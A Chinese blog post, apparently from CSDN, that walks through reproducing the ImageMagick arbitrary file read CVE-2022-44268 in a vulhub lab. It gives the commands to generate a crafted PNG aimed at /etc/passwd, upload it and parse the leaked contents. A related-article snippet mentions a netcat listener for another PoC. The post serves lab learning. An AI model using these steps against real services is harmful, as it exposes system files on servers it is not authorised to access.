ImageMagick任意文件读取漏洞(CVE-2022-44268)vulhub漏洞复现

最新推荐文章于 2024-06-17 09:10:54 发布
最新推荐文章于 2024-06-17 09:10:54 发布
阅读量305 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/132019236
版权

ImageMagick任意文件读取漏洞(CVE-2022-44268)

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。在ImageMagick 7.1.0-51版本及以前,其处理PNG文件的代码中存在一处功能,会导致转换图片时读取到当前操作系统上的任意文件,并将文件内容输出在图片内容中。

漏洞复现

cd vulhub-master/

cd imagemagick/

cd CVE-2022-44268/

docker-compose up -d

访问ip:8080 有一个文件上传的页面,功能是将用户上传的任意图片缩小成50x50的PNG图片。

在这里插入图片描述

攻击准备

1.安装pypng

pip install pypng

2.执行poc生成恶意图片

vulhub/imagemagick/CVE-2022-44268/poc.py at master · vulhub/vulhub (github.com)

./poc.py generate -o poc.png -r /etc/passwd

在这里插入图片描述

3.上传生成的图片

在这里插入图片描述
将your image的图片下载下来

在这里插入图片描述

4.使用poc.py读取下载的图片

./poc.py parse -i 64c72b09b2763.png

在这里插入图片描述

5./etc/passwd读取成功

芝士土包鼠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
metalsmith-convert:使用imagemagick转换图像(通过imagemagick-native)
05-09
有人在用吗? 因为我不是:) 如果有我以外的人可以担任维护者,以防万一有用户,那将是非常受欢迎的。 我认为,安全性和可用性将受益。 金属史密斯转换 这是的插件,它使用转换图像文件 安装 该模块是通过npm发布的,请使用以下命令安装最新发布的版本: npm install --save metalsmith-convert 依存关系 该模块使用node-imagemagick-native。 您必须能够编译c ++代码以安装imagemagick-native。 提供了针对Linux,Mac OS X和Windows的说明。 用法 如果对Metalsmith使用CLI,则可以将metalsmith-convert包含在metalsmith.json ,使其与其他任何插件一样使用。 例如: { " plugins " : { " metalsmith-convert " :
ImageMagick-6.9.3-7-Q16-x64-dll.exe dll版本,q16是十六位
10-13
ImageMagick-6.9.3-7-Q16-x64-dll.exe ,又要其他版本的可以私信我,我帮你找找看
ImageMagick-6.9.1-10-Q16-x86-dll.exe
06-16
ImageMagick是一套功能强大、稳定而且免费的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,包括流行的TIFF、JPEG、GIF、 PNG、PDF以及PhotoCD等格式。利用ImageMagick,你可以根据web应用程序的需要动态生成图片, 还可以对一个(或一组)图片进行改变大小、旋转、锐化、减色或增加特效等操作,并将操作的结果以相同格式或其它格式保存,对图片的操作,即可以通过命令行进行,也可以用C/C++、Perl、Java、PHP、Python或Ruby编程来完成。同时ImageMagick提供了一个高质量的2D工具包,部分支持SVG。现在,ImageMagic的主要精力集中在性能,减少bug以及提供稳定的API和ABI上。 ImageMagick 是一个用来创建、编辑、合成图片的软件。它可以读取、转换、写入多种格式的图片。图片切割、颜色替换、各种效果的应用,图片的旋转、组合,文本,直线, 多边形,椭圆,曲线,附加到图片伸展旋转。ImageMagick是免费软件:全部源码开放,可以自由使用,复制,修改,发布。支持大多数的操作系统。
Juniper Product
09-12
Juniper Product
ImageMagick-6.7.5-0-Q16-windows.zip
09-28
ImageMagick-6.7.5-0-Q16 windows版,php扩展使用,网站环境使用。低版本。
ImageMagick任意文件读取漏洞(CVE-2022-44268)
god_Zeo的安全博客
02-12 3574
爆出一个 ImageMagick 漏洞 CVE-2022-44268 ,在ImageMagick 7.1.0-51版本及以前 ,可以造成一个任意文件读取的危害比较可观,最近有时间来复现学习一下
漏洞复现CVE-2022-44268 ImageMagick任意文件读取漏洞
m0_53121608的博客
07-13 236
漏洞复现CVE-2022-44268 ImageMagick任意文件读取漏洞
ImageMagick任意文件读取(CVE-2022-44268)
qq_32445755的博客
03-23 513
ImageMagick是一个免费的创建、编辑、合成图片的软件。它可以读取、转换、写入多种格式的图片。ImageMagick的大多数功能的使用都来源于命令行工具。当 ImageMagick 解析 PNG 文件时,例如在调整大小操作中,生成的图像可能嵌入了来自网站的任意远程文件的内容(如果 magick 二进制文件有权读取它)。恶意行为者可以制作 PNG 或使用现有 PNG 并添加文本块类型(例如 tEXt)。这些类型具有关键字和文本字符串。
热门开源软件ImageMagick中出现多个新漏洞
smellycat000的专栏
02-02 1574
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员详述了开源软件 ImageMagick 中的两个漏洞详情,它们可导致拒绝服务和信息泄露后果。这两个漏洞是由拉美网络安全公司 etabase Q 在7.1.0-49版本中发现的,已在2022年11月发布的ImageMagick 7.1.0-52中修复。这两个漏洞CVE-2022-44267和CVE-2022-44268:前者是一个D...
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 900
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
oracle死锁
06-03
oracle死锁解决办法。可查看死锁语句、表、用户,包含解决办法。
CVE-2022-24112/POC
LinuxK的博客
08-13 213
python3 poc2.py -t eci-2zecqo925diajhkbbasa.cloudeci1.ichunqiu.com(春秋云镜打开的靶场地址,有端口加后面参数-p后面) -p 9080 -L。1,使用隧道代理软件将本地端口如8888映射到公网访问(自行百度这里不能说)4,然后在本地监听的netcat里cat /flag即可。2,使用netcat -lvnp 8888监听本地端口。+隧道代理的公网ip端口。+隧道代理的公网ip。
漏洞复现ImageMagick命令注入漏洞(CVE-2016–3714/15/16/17/18)
m0_52923241的博客
04-03 1134
ImageMagic是一款图片处理工具,当传入一个恶意图片时,就有可能存在命令注入漏洞ImageMagick默认支持一种图片格式mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。影响ImageMagick 6.9.3-9以前的所有版本。
复现cve-2022-44268
jjjj1029056414的博客
07-15 124
复现cve-2022-44268ImageMagick任意文件读取漏洞
ImageMagick命令注入漏洞(CVE-2016–3714)复现笔记
u011975363的专栏
06-18 2116
学习资料 https://www.cnblogs.com/bmjoker/p/9898590.html https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html 漏洞原理 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 国外的安全人员为此新建了一个网站:
vulhub漏洞复现27_Imagemagick
weixin_44193247的博客
02-02 887
vulhub漏洞复现练习篇
ImageMagick 漏洞复现之路
一个码农的笔记
08-31 3788
我的环境是centos7 ,php是PHP 5.4.16,ImageMagick是6.7.8-9正好在影响范围之内,但是官方还是对其官网上所有的安装包进行了修复,所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的, 我们看看官方都是怎么修复的,并且还原漏洞现场 漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2
网络安全网络安全威胁及途径
最新发布
衍生星球的博客
06-17 210
目前,网络的主要应用包括:电子商务、网上银行、股票、证券、期货交易、即时通信、邮件、网游、下载文件或点击链接等,这些应用都存在大量的安全威胁和隐患。网络安全管理中出现的漏洞和疏忽都属于人为因素,网络安全中最突出的问题是缺乏完善的法律法规、管理准则规范和制度、网络安全组织机构及人员,不够重视或缺少安全检测及实时有效的监控、维护和审计。网络安全的威胁和风险主要涉及网络系统研发、结构、层次、范畴、应用和管理等,要做好网络安全防范,必须进行认真深入的调研、分析和研究,以解决网络系统的安全风险及隐患。
CVE-2022-44268
09-01
- *3* [ImageMagick任意文件读取漏洞CVE-2022-44268vulhub漏洞复现](https://blog.csdn.net/qq_53003652/article/details/132019236)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值